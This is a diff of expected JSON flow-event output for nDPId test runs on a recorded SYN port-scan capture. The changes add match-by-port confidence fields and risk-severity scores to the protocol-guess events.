 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5544,13 +5544,13 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00681{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}}
+00798{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","ndpi": {"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}}
+00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}}
 00568{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5590,11 +5590,11 @@
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","ndpi": {"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","ndpi": {"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5612,7 +5612,7 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00739{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5660,7 +5660,7 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5686,9 +5686,9 @@
